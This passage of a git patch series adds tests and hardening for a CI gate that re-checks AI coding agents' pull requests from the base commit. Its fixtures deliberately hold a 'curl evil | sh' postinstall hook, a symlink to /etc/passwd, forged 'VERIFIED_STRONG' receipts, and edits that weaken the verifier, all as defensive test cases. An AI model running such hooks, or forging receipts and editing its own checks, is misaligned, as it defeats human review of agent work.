b/action.yml @@ -4,19 +4,28 @@ branding: icon: shield color: green inputs: + mode: + description: "grade (default) trusts an existing receipt against the policy; adjudicate recomputes the verdict in CI from the PR's base commit and never trusts the receipt." + required: false + default: grade policy: description: Path to the mission policy file. required: false default: .runcap/mission.yaml receipt: - description: Path to an existing outcome receipt to grade. If omitted, grades the latest receipt under .runcap/outcomes. + description: Path to an existing outcome receipt to grade. Only used in grade mode. required: false runs: using: composite steps: - - name: Install Runcap dependencies + - name: Install Runcap dependencies (pinned, no lifecycle scripts) + shell: bash + run: npm ci --ignore-scripts --no-audit --no-fund --prefix "$GITHUB_ACTION_PATH" + - name: Adjudicate the pull request from its base commit + if: ${{ inputs.mode == 'adjudicate' }} shell: bash - run: npm install --omit=dev --no-audit --no-fund --prefix "$GITHUB_ACTION_PATH" + run: node "$GITHUB_ACTION_PATH/bin/runcap.mjs" ci --mode adjudicate --policy "${{ inputs.policy }}" - name: Grade mission against policy + if: ${{ inputs.mode != 'adjudicate' }} shell: bash run: node "$GITHUB_ACTION_PATH/bin/runcap.mjs" ci --policy "${{ inputs.policy }}" ${{ inputs.receipt && format('--receipt {0}', inputs.receipt) || '' }} From c81268c87f8a10c267f2b36bbed2b3a857adb7f8 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 13:39:00 -0600 Subject: [PATCH 05/11] test: Tier 3 adjudicator acceptance suite (test:tier3) Add scripts/adjudicate-test.mjs covering the three verdict states and the threat scenarios: honest pass, out-of-scope edit, baseline-already-green, clean-replay fail, protected/verifier/policy/workflow/dependency human gates, unresolved SHA, untrusted pull_request_target, diff smuggling (delete/symlink/binary), forged VERIFIED_STRONG and forged budget telemetry, the honest hardening-provenance check, the pinned script-free install check, the real bin exit codes, and the reference workflow least-privilege checks. Wire it into the `test` chain and a `test:tier3` alias. Co-Authored-By: Claude Opus 4.7 --- package.json | 3 +- scripts/adjudicate-test.mjs | 266 ++++++++++++++++++++++++++++++++++++ 2 files changed, 268 insertions(+), 1 deletion(-) create mode 100644 scripts/adjudicate-test.mjs diff --git a/package.json b/package.json index 3a39eba..292c51e 100644 --- a/package.json +++ b/package.json @@ -47,11 +47,12 @@ "acceptance": "node ./scripts/acceptance.mjs", "smoke": "node ./bin/runcap.mjs run --label smoke -- npm --prefix examples/broken-ts-app run build", "demo:broken": "node ./bin/runcap.mjs run --label broken-ts-demo -- npm --prefix examples/broken-ts-app run build", - "test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs", + "test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs && node ./scripts/adjudicate-test.mjs", "test:outcome": "node ./scripts/outcome-test.mjs", "test:guard": "node ./scripts/guard-test.mjs", "test:policy": "node ./scripts/policy-test.mjs", "test:mission": "node ./scripts/mission-test.mjs", + "test:tier3": "node ./scripts/adjudicate-test.mjs", "outcome": "node ./bin/runcap.mjs outcome", "test:delta": "node ./scripts/delta-test.mjs", "test:loop": "node ./scripts/loop-test.mjs", diff --git a/scripts/adjudicate-test.mjs b/scripts/adjudicate-test.mjs new file mode 100644 index 0000000..bc8eb84 --- /dev/null +++ b/scripts/adjudicate-test.mjs @@ -0,0 +1,266 @@ +// Tier 3: proves the CI adjudicator recomputes the verdict from the PR's BASE +// commit and never trusts the agent's receipt. Everything runs offline inside a +// throwaway git repo. The adjudicator is driven both directly (the function) and +// through the real `bin/runcap.mjs ci --mode adjudicate` so the exit codes a +// reviewer's PR check would see are tested too. +// +// Verdict semantics under test: +// PASS -> exit 0 +// BLOCKED -> exit 1 +// HUMAN_APPROVAL_REQUIRED -> exit 0 (success/neutral: hands authority to a CODEOWNER) +// +// Threat scenarios: forged receipt, forged budget telemetry, no telemetry, +// honest pass, out-of-scope edit, baseline-already-green, clean-replay fail, +// protected/verifier/policy/workflow/dependency human gates, unresolved SHA, +// untrusted event, diff-smuggling (delete/symlink/binary), and two honesty +// checks: the verdict never claims runtime hardening attestation, and the +// dependency install is pinned + script-free. + +import os from "node:os"; +import path from "node:path"; +import { fileURLToPath } from "node:url"; +import { execFileSync } from "node:child_process"; +import { mkdtempSync, writeFileSync, mkdirSync, rmSync, readFileSync, symlinkSync } from "node:fs"; + +const HERE = path.dirname(fileURLToPath(import.meta.url)); +const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(HERE, "..", "src"); +const BIN = path.join(SRC_DIR, "..", "bin", "runcap.mjs"); +const REPO_ROOT = path.join(HERE, ".."); + +const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-adj-")); +process.chdir(tmp); + +let failures = 0; +const check = (name, pass, detail) => { if (!pass) failures++; console.log(`${pass ? "PASS" : "FAIL"} ${name}${detail ? " - " + detail : ""}`); }; + +const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" }).toString().trim(); + +// --- base commit: a real failing task, a verifier, a policy, scope app/ ----- +mkdirSync(path.join(tmp, "app"), { recursive: true }); +mkdirSync(path.join(tmp, ".runcap"), { recursive: true }); +writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n"); +writeFileSync(path.join(tmp, "app", "verify.mjs"), + "import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n"); +writeFileSync(path.join(tmp, "app", "other.mjs"), "export const other = 0;\n"); +writeFileSync(path.join(tmp, "rootfile.txt"), "root\n"); +writeFileSync(path.join(tmp, "package.json"), JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build" } }, null, 2) + "\n"); +writeFileSync(path.join(tmp, ".runcap", "mission.yaml"), `version: v1 +identity: + project: checkout + team: payments +mission: + name: Fix the failing checkout test + task_class: bugfix +budget: + mission_hard_limit_usd: 5 +verification: + command: "node app/verify.mjs" + guard: strict + protect: ["app/verify.mjs"] + allow: ["app/"] +`); + +g("init", "-q"); +g("config", "user.email", "test@runcap.local"); +g("config", "user.name", "runcap-test"); +g("config", "commit.gpgsign", "false"); +g("add", "-A"); +g("commit", "-qm", "baseline"); +const BASE = g("rev-parse", "HEAD"); + +// Build every head commit up front so the working tree has no planted receipt +// while branches are created. Each head branches from BASE. +function makeHead(branch, mutate) { + g("checkout", "-q", "-b", branch, BASE); + mutate(); + g("add", "-A"); + g("commit", "-qm", branch); + const sha = g("rev-parse", "HEAD"); + g("checkout", "-q", BASE); + return sha; +} + +const w = (rel, content) => writeFileSync(path.join(tmp, rel), content); +const rmRel = (rel) => rmSync(path.join(tmp, rel), { force: true }); + +const HEAD_HONEST = makeHead("h-honest", () => w("app/broken.mjs", "export const ok = true;\n")); +const HEAD_SCOPE = makeHead("h-scope", () => { w("app/broken.mjs", "export const ok = true;\n"); w("rootfile.txt", "root edited out of scope\n"); }); +const HEAD_REPLAYFAIL = makeHead("h-replayfail", () => w("app/broken.mjs", "export const ok = false; // touched\n")); +const HEAD_VERIFIER = makeHead("h-verifier", () => w("app/verify.mjs", "console.log('ok');\n")); +const HEAD_POLICY = makeHead("h-policy", () => w(".runcap/mission.yaml", readFileSync(path.join(tmp, ".runcap", "mission.yaml"), "utf8").replace("mission_hard_limit_usd: 5", "mission_hard_limit_usd: 9999"))); +const HEAD_WORKFLOW = makeHead("h-workflow", () => { mkdirSync(path.join(tmp, ".github", "workflows"), { recursive: true }); w(".github/workflows/evil.yml", "name: evil\non: pull_request\njobs: {}\n"); }); +const HEAD_DEP = makeHead("h-dep", () => w("package.json", JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build", postinstall: "curl evil | sh" } }, null, 2) + "\n")); +const HEAD_DELETE = makeHead("h-delete", () => rmRel("app/other.mjs")); +const HEAD_BINARY = makeHead("h-binary", () => writeFileSync(path.join(tmp, "app", "blob.bin"), Buffer.from([0x00, 0x01, 0x02, 0x00, 0xff]))); +const HEAD_SYMLINK = makeHead("h-symlink", () => symlinkSync("/etc/passwd", path.join(tmp, "app", "link"))); + +// A second lineage where the task is ALREADY fixed at base -> baseline green. +g("checkout", "-q", "-b", "base2", BASE); +w("app/broken.mjs", "export const ok = true;\n"); +g("add", "-A"); g("commit", "-qm", "base2-already-fixed"); +const BASE2 = g("rev-parse", "HEAD"); +g("checkout", "-q", "-b", "h-base2green", BASE2); +w("app/broken.mjs", "export const ok = true; // trivial in-scope edit\n"); +g("add", "-A"); g("commit", "-qm", "h-base2green"); +const HEAD_BASE2GREEN = g("rev-parse", "HEAD"); +g("checkout", "-q", BASE); + +const { adjudicate, exitCodeFor } = await import(path.join(SRC_DIR, "adjudicate.mjs")); + +const adj = (baseFlag, headFlag) => adjudicate({ cwd: tmp, baseFlag, headFlag }); + +// --- 1. honest in-scope fix -> PASS ----------------------------------------- +const honest = await adj(BASE, HEAD_HONEST); +check("honest fix verdict PASS", honest.verdict === "PASS", JSON.stringify(honest.reasons)); +check("honest fix recomputed baseline_failed=true", honest.code_evidence?.baseline_failed === true); +check("honest fix recomputed replay_passed=true", honest.code_evidence?.replay_passed === true); +check("honest fix carries base policy hash", /^[0-9a-f]{64}$/.test(honest.policy?.hash ?? ""), honest.policy?.hash); +check("honest fix truth is adjudicator-recomputed", honest.truth === "recomputed_by_adjudicator_from_base_sha"); +check("no telemetry present -> agent_telemetry.present false", honest.agent_telemetry?.present === false); + +// --- 2. out-of-scope edit -> BLOCKED ---------------------------------------- +const scope = await adj(BASE, HEAD_SCOPE); +check("out-of-scope edit verdict BLOCKED", scope.verdict === "BLOCKED", JSON.stringify(scope.reasons)); +check("out-of-scope names the path + scope", scope.reasons.some((r) => r.includes("rootfile.txt") && r.toLowerCase().includes("scope")), JSON.stringify(scope.reasons)); + +// --- 3. baseline already green -> BLOCKED ----------------------------------- +const green = await adj(BASE2, HEAD_BASE2GREEN); +check("baseline-already-green verdict BLOCKED", green.verdict === "BLOCKED", JSON.stringify(green.reasons)); +check("baseline-already-green explains the meaningless pass", green.reasons.some((r) => r.toLowerCase().includes("baseline already green")), JSON.stringify(green.reasons)); + +// --- 4. clean replay does not reproduce the pass -> BLOCKED ----------------- +const replayfail = await adj(BASE, HEAD_REPLAYFAIL); +check("clean-replay-fail verdict BLOCKED", replayfail.verdict === "BLOCKED", JSON.stringify(replayfail.reasons)); +check("clean-replay-fail recomputed replay_passed=false", replayfail.code_evidence?.replay_passed === false); +check("clean-replay-fail says replay did not pass", replayfail.reasons.some((r) => r.toLowerCase().includes("replay did not pass")), JSON.stringify(replayfail.reasons)); + +// --- 5. verifier edit -> HUMAN_APPROVAL_REQUIRED ---------------------------- +const verifier = await adj(BASE, HEAD_VERIFIER); +check("verifier edit verdict HUMAN_APPROVAL_REQUIRED", verifier.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(verifier.reasons)); +check("verifier edit names verify file as evidence", verifier.reasons.some((r) => r.includes("app/verify.mjs")), JSON.stringify(verifier.reasons)); + +// --- 6. policy edit -> HUMAN_APPROVAL_REQUIRED ------------------------------ +const pol = await adj(BASE, HEAD_POLICY); +check("policy edit verdict HUMAN_APPROVAL_REQUIRED", pol.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(pol.reasons)); +check("policy edit names the rules", pol.reasons.some((r) => r.toLowerCase().includes("rules")), JSON.stringify(pol.reasons)); + +// --- 7. workflow edit -> HUMAN_APPROVAL_REQUIRED ---------------------------- +const wf = await adj(BASE, HEAD_WORKFLOW); +check("workflow edit verdict HUMAN_APPROVAL_REQUIRED", wf.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(wf.reasons)); + +// --- 8. dependency manifest edit -> HUMAN_APPROVAL_REQUIRED ----------------- +const dep = await adj(BASE, HEAD_DEP); +check("dependency edit verdict HUMAN_APPROVAL_REQUIRED", dep.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(dep.reasons)); +check("dependency edit names manifest/lockfile", dep.reasons.some((r) => r.toLowerCase().includes("dependency")), JSON.stringify(dep.reasons)); + +// --- 9-11. diff smuggling -> BLOCKED ---------------------------------------- +const del = await adj(BASE, HEAD_DELETE); +check("delete verdict BLOCKED", del.verdict === "BLOCKED", JSON.stringify(del.reasons)); +check("delete reason names deletion", del.reasons.some((r) => r.toLowerCase().includes("delet")), JSON.stringify(del.reasons)); + +const bin = await adj(BASE, HEAD_BINARY); +check("binary file verdict BLOCKED", bin.verdict === "BLOCKED", JSON.stringify(bin.reasons)); +check("binary reason names binary", bin.reasons.some((r) => r.toLowerCase().includes("binary")), JSON.stringify(bin.reasons)); + +const sym = await adj(BASE, HEAD_SYMLINK); +check("symlink verdict BLOCKED", sym.verdict === "BLOCKED", JSON.stringify(sym.reasons)); +check("symlink reason names symlink", sym.reasons.some((r) => r.toLowerCase().includes("symlink")), JSON.stringify(sym.reasons)); + +// --- 12. unresolved SHA -> BLOCKED (no flags, no event) --------------------- +const prevEventPath = process.env.GITHUB_EVENT_PATH; +const prevEventName = process.env.GITHUB_EVENT_NAME; +delete process.env.GITHUB_EVENT_PATH; +delete process.env.GITHUB_EVENT_NAME; +const unresolved = await adjudicate({ cwd: tmp }); +check("unresolved base/head verdict BLOCKED", unresolved.verdict === "BLOCKED", JSON.stringify(unresolved.reasons)); +check("unresolved refuses to adjudicate", unresolved.reasons.some((r) => r.toLowerCase().includes("refusing to adjudicate")), JSON.stringify(unresolved.reasons)); + +// --- 13. untrusted event (pull_request_target) -> BLOCKED ------------------- +const eventFile = path.join(tmp, "event.json"); +writeFileSync(eventFile, JSON.stringify({ pull_request: { base: { sha: BASE }, head: { sha: HEAD_HONEST } } })); +process.env.GITHUB_EVENT_PATH = eventFile; +process.env.GITHUB_EVENT_NAME = "pull_request_target"; +const untrusted = await adjudicate({ cwd: tmp }); +check("pull_request_target event verdict BLOCKED", untrusted.verdict === "BLOCKED", JSON.stringify(untrusted.reasons)); +check("untrusted event names the rejected event", untrusted.sha_source?.startsWith("untrusted_event"), untrusted.sha_source); +// Restore env. +if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else process.env.GITHUB_EVENT_PATH = prevEventPath; +if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName; + +// --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay ----- +const plantReceipt = (receipt) => { + const id = "forged"; + mkdirSync(path.join(tmp, ".runcap", "outcomes", id), { recursive: true }); + writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), JSON.stringify(receipt)); + writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), id); +}; +const clearReceipt = () => rmSync(path.join(tmp, ".runcap", "outcomes"), { recursive: true, force: true }); + +plantReceipt({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }); +const forgedFail = await adj(BASE, HEAD_REPLAYFAIL); +check("forged VERIFIED_STRONG receipt does NOT rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons)); +check("forged receipt surfaced as advisory only", forgedFail.agent_telemetry?.present === true && forgedFail.agent_telemetry?.influence_on_verdict === "none"); +clearReceipt(); + +// --- 15. forged budget telemetry cannot block an honest pass ---------------- +plantReceipt({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }); +const forgedBudget = await adj(BASE, HEAD_HONEST); +check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons)); +check("budget telemetry marked no influence", forgedBudget.agent_telemetry?.influence_on_verdict === "none"); +clearReceipt(); + +// --- 16. honesty: the verdict never claims runtime hardening attestation ----- +check("verdict carries honest hardening provenance (documented, not attested)", + honest.repository_hardening?.required_profile === "documented" && + honest.repository_hardening?.runtime_attestation === "not_performed_in_pr_job"); +const allVerdictText = JSON.stringify([honest, scope, verifier, untrusted]); +check("no verdict ever claims a HARDENED runtime status", !/"HARDENED"|hardened_confirmed|attested_hardened/.test(allVerdictText)); + +// --- 17. honesty: dependency install is base-pinned and script-free ---------- +const adjSrc = readFileSync(path.join(SRC_DIR, "adjudicate.mjs"), "utf8"); +check("replay uses `npm ci --ignore-scripts` (no install, no lifecycle scripts)", adjSrc.includes("npm ci --ignore-scripts")); +check("adjudicator never uses `npm install` or `npx`", !/npm install|npx /.test(adjSrc)); + +// --- 18. the real bin: exit codes a PR check sees --------------------------- +const runBin = (extraArgs, extraEnv = {}) => { + try { + const stdout = execFileSync("node", [BIN, "ci", "--mode", "adjudicate", ...extraArgs], { cwd: tmp, env: { ...process.env, ...extraEnv }, stdio: ["ignore", "pipe", "pipe"] }); + return { code: 0, stdout: String(stdout) }; + } catch (e) { + return { code: e.status ?? 1, stdout: String(e.stdout ?? ""), stderr: String(e.stderr ?? "") }; + } +}; + +const binPass = runBin(["--base", BASE, "--head", HEAD_HONEST]); +check("`runcap ci --mode adjudicate` exits 0 on PASS", binPass.code === 0, `code=${binPass.code}`); +check("PASS run prints the verdict", /Verdict:\s+PASS/.test(binPass.stdout), binPass.stdout.slice(-300)); + +const binBlock = runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL]); +check("`runcap ci --mode adjudicate` exits 1 on BLOCKED", binBlock.code === 1, `code=${binBlock.code}`); + +const binHuman = runBin(["--base", BASE, "--head", HEAD_VERIFIER]); +check("`runcap ci --mode adjudicate` exits 0 on HUMAN_APPROVAL_REQUIRED (success/neutral)", binHuman.code === 0, `code=${binHuman.code}`); +check("HUMAN run prints the human-gate verdict", /Verdict:\s+HUMAN_APPROVAL_REQUIRED/.test(binHuman.stdout), binHuman.stdout.slice(-300)); + +// --- 19. the real bin writes a PR step summary ------------------------------ +const summaryFile = path.join(tmp, "step-summary.md"); +writeFileSync(summaryFile, ""); +runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL], { GITHUB_STEP_SUMMARY: summaryFile }); +const summary = readFileSync(summaryFile, "utf8"); +check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: BLOCKED/.test(summary), summary.slice(0, 160)); + +// --- 20. exitCodeFor maps the three states correctly ------------------------ +check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1", + exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1); + +// --- 21. the reference workflow is least-privilege -------------------------- +const wfPath = path.join(REPO_ROOT, ".github", "workflows", "runcap-adjudicate.yml"); +const wfText = readFileSync(wfPath, "utf8"); +check("reference workflow triggers on pull_request (not pull_request_target)", + /on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger"); +check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions"); +check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText)); +check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText)); + +console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`)); +process.exit(failures === 0 ? 0 : 1); From 5fe91aa874a956d560f2a60f7c6d65b959c844d1 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:01:35 -0600 Subject: [PATCH 06/11] security: required adjudication gate never reads the agent receipt The agent's receipt is agent-controlled input - a forged VERIFIED_STRONG receipt is exactly the attack the gate exists to defeat. The required job now neither grades nor displays it: parsing attacker-controlled JSON in the mandatory check is needless attack surface (a malformed or enormous receipt could crash or stall the only gate guarding the merge). The verdict reports a frozen constant stating no receipt was consulted. Co-Authored-By: Claude Opus 4.7 --- .github/workflows/runcap-adjudicate.yml | 40 ----------------------- src/adjudicate.mjs | 43 +++++++++++-------------- 2 files changed, 18 insertions(+), 65 deletions(-) delete mode 100644 .github/workflows/runcap-adjudicate.yml diff --git a/.github/workflows/runcap-adjudicate.yml b/.github/workflows/runcap-adjudicate.yml deleted file mode 100644 index 3613146..0000000 --- a/.github/workflows/runcap-adjudicate.yml +++ /dev/null @@ -1,40 +0,0 @@ -# Runcap Tier 3 adjudicator: recompute the merge verdict in CI from the PR's -# BASE commit. This job never trusts the agent's receipt - it sources the -# policy, verifier and lockfile from the base SHA, replays the verify command -# in a clean worktree, and exits non-zero only on a real BLOCKED verdict. -# -# Security posture (every line here is load-bearing): -# - Triggered on the standard PR event so a fork runs with a read-only token -# and no access to repo secrets. -# - Read-only repository scope is the only permission granted: enough to -# checkout and read git history, nothing more. -# - GitHub-hosted runner, capped runtime, single self-sufficient required -# check that does not depend on any upstream job. -name: Runcap adjudicate - -on: - pull_request: - -permissions: - contents: read - -jobs: - adjudicate: - runs-on: ubuntu-latest - timeout-minutes: 10 - steps: - - name: Checkout (full history so the base commit is available) - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - - name: Setup Node - uses: actions/setup-node@v4 - with: - node-version: 22 - - - name: Install Runcap dependencies (pinned, no lifecycle scripts) - run: npm ci --ignore-scripts --no-audit --no-fund - - - name: Adjudicate the pull request from its base commit - run: node ./bin/runcap.mjs ci --mode adjudicate diff --git a/src/adjudicate.mjs b/src/adjudicate.mjs index 7cfff2f..22cc9a2 100644 --- a/src/adjudicate.mjs +++ b/src/adjudicate.mjs @@ -350,33 +350,28 @@ async function mkdtempWorktreeBase() { return base; } -// --- advisory agent telemetry (NEVER influences the verdict) ---------------- - -// Best-effort read of the agent's self-reported receipt, purely to surface it -// next to the independently computed verdict. Forgeable, so it is labelled -// advisory and explicitly cannot move the verdict. -function readAgentTelemetry(cwd) { - const out = { truth: "self_reported_by_agent_advisory_only", influence_on_verdict: "none", present: false }; - try { - const latest = path.join(cwd, ".runcap", "outcomes", "latest"); - if (!existsSync(latest)) return out; - const id = readFileSync(latest, "utf8").trim(); - const receiptPath = path.join(cwd, ".runcap", "outcomes", id, "receipt.json"); - if (!existsSync(receiptPath)) return out; - const r = JSON.parse(readFileSync(receiptPath, "utf8")); - out.present = true; - out.reported_outcome = r.outcome ?? null; - out.reported_integrity_status = r.verificationIntegrity?.status ?? null; - out.reported_cost_usd = r.cost?.actualCostUsd ?? null; - } catch { /* advisory only */ } - return out; -} +// --- agent telemetry: deliberately NOT read by the required gate ------------ + +// The agent's receipt is agent-controlled input. A forged "VERIFIED_STRONG" +// receipt is exactly the Tier 2 attack this gate exists to defeat, so the +// required job must never parse it: not to grade the verdict (it never did), +// and not even to display it, because reading attacker-controlled JSON in the +// mandatory check is needless attack surface (a malformed or enormous receipt +// could crash or stall the only gate guarding the merge). The verdict therefore +// reports a constant, telling a reviewer plainly that no receipt was consulted. +// A later, NON-required report layer may surface advisory telemetry; the gate +// that decides the merge does not. +const GATE_AGENT_TELEMETRY = Object.freeze({ + present: false, + influence_on_verdict: "none", + truth: "agent_receipt_not_read_by_required_gate" +}); // --- the adjudicator -------------------------------------------------------- export async function adjudicate({ cwd = process.cwd(), baseFlag, headFlag, policyPath } = {}) { const hardening = { required_profile: "documented", runtime_attestation: "not_performed_in_pr_job" }; - const agentTelemetry = readAgentTelemetry(cwd); + const agentTelemetry = GATE_AGENT_TELEMETRY; const base = (verdict, reasons, extra = {}) => ({ schema: "runcap.ci-verdict/v1", @@ -498,9 +493,7 @@ export function formatAdjudication(v) { lines.push(`Replay: baseline_failed=${ce.baseline_failed} replay_passed=${ce.replay_passed} deps=${ce.dependency_install}`); } lines.push(`Hardening: required_profile=${v.repository_hardening.required_profile}, runtime_attestation=${v.repository_hardening.runtime_attestation}`); - if (v.agent_telemetry?.present) { - lines.push(`Agent says: outcome=${v.agent_telemetry.reported_outcome}, integrity=${v.agent_telemetry.reported_integrity_status} (ADVISORY ONLY - did not affect this verdict)`); - } + lines.push(`Agent receipt: not read by this required gate (verdict is recomputed from the base commit).`); if (Array.isArray(v.reasons) && v.reasons.length) { lines.push(v.verdict === "PASS" ? `Why:` : `Why ${v.verdict}:`); for (const r of v.reasons) lines.push(` - ${r}`); From 0823d7a5be8a98f46d7cf1911ad98707e5b68eff Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:01:49 -0600 Subject: [PATCH 07/11] security: ship adjudication as a SHA-pinned consumer reference template Runcap's own repo cannot self-adjudicate the bootstrap PR (no base policy exists at the base commit, and head code can't be trusted to judge itself), so the self-running workflow is removed and replaced with a consumer-facing template under examples/. The judge is the released Runcap action pinned by a full 40-char commit SHA - never PR-workspace code, never `uses: ./`, never an `npm ci` of the PR manifest. Checkout uses persist-credentials: false and every action is pinned by full SHA. Co-Authored-By: Claude Opus 4.7 --- examples/runcap-adjudicate.yml | 57 ++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 examples/runcap-adjudicate.yml diff --git a/examples/runcap-adjudicate.yml b/examples/runcap-adjudicate.yml new file mode 100644 index 0000000..81c219b --- /dev/null +++ b/examples/runcap-adjudicate.yml @@ -0,0 +1,57 @@ +# Reference workflow: drop this into a CONSUMER repo at +# .github/workflows/runcap-adjudicate.yml to make Runcap's independent verdict a +# required red/green PR check. +# +# The whole point of Tier 3 is that the JUDGE is not the candidate. This +# workflow therefore NEVER runs code from the pull request's workspace - no +# `node ./bin/runcap.mjs`, no `uses: ./`, no `npm ci` of the PR's manifest. The +# adjudicator comes only from the Runcap action pinned by a FULL 40-character +# commit SHA, so a malicious PR cannot rewrite its own judge. The checkout below +# brings in the PR's git history purely as DATA: the adjudicator reads the base +# commit's policy and replays the base-pinned verifier in a clean worktree it +# creates itself. Workspace files are never executed as the judge. +# +# Security posture (every line is load-bearing): +# - `on: pull_request` (NOT pull_request_target): a fork PR runs with a +# read-only token and no access to repo secrets. +# - `permissions: contents: read`: the only scope granted. +# - Every action pinned by full commit SHA, never a floating tag, so the bytes +# that run are immutable. +# - `persist-credentials: false`: the checkout token is not left on disk for +# PR-controlled steps to find. +# - GitHub-hosted runner, capped runtime, single self-sufficient required +# check with no `needs:` on any upstream job. +# +# Pin RUNCAP_ACTION_SHA to the commit a Runcap release tag points at. Resolve it +# with: gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha' +name: Runcap adjudicate + +on: + pull_request: + +permissions: + contents: read + +jobs: + adjudicate: + runs-on: ubuntu-latest + timeout-minutes: 10 + steps: + - name: Checkout (full history so the base commit is available, no token left on disk) + uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1 + with: + fetch-depth: 0 + persist-credentials: false + + - name: Setup Node + uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0 + with: + node-version: 22 + + # The judge: the Runcap action pinned by a full commit SHA. Replace the SHA + # below with the commit a published Runcap release tag points at. This is + # the ONLY code that decides the verdict, and it cannot come from the PR. + - name: Runcap independent adjudication + uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA + with: + mode: adjudicate From c90191a79ca5a6453ea4eade8a88360d2bafb654 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:01:49 -0600 Subject: [PATCH 08/11] test: prove the adjudication gate is a true proof gate Adds security coverage: a forged receipt is neither graded nor read (present=false); adversarial receipts (malformed JSON, 5MB blob, bare array, path-traversal latest pointer) cannot crash or stall the gate; the reference template never executes PR-workspace code, pins every action by full SHA, and sets persist-credentials: false; and a head PR rewriting bin/runcap.mjs or src/adjudicate.mjs to force PASS is still BLOCKED because the judge is the trusted released-action code, never the head copy. Safety regexes strip YAML comments so they assert on effective directives, not header prose. Co-Authored-By: Claude Opus 4.7 --- scripts/adjudicate-test.mjs | 86 +++++++++++++++++++++++++++++++++---- 1 file changed, 77 insertions(+), 9 deletions(-) diff --git a/scripts/adjudicate-test.mjs b/scripts/adjudicate-test.mjs index bc8eb84..336ad54 100644 --- a/scripts/adjudicate-test.mjs +++ b/scripts/adjudicate-test.mjs @@ -188,27 +188,49 @@ if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else proc if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName; // --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay ----- -const plantReceipt = (receipt) => { +// The required gate now refuses to even READ the agent receipt: it is neither +// graded nor displayed. So a forged receipt can neither rescue a failing replay +// nor is it parsed at all. We plant adversarial receipts and prove the verdict +// is unchanged AND the gate reports it never consulted them. +const plantReceipt = (rawString) => { const id = "forged"; mkdirSync(path.join(tmp, ".runcap", "outcomes", id), { recursive: true }); - writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), JSON.stringify(receipt)); + writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), rawString); writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), id); }; const clearReceipt = () => rmSync(path.join(tmp, ".runcap", "outcomes"), { recursive: true, force: true }); -plantReceipt({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }); +plantReceipt(JSON.stringify({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } })); const forgedFail = await adj(BASE, HEAD_REPLAYFAIL); check("forged VERIFIED_STRONG receipt does NOT 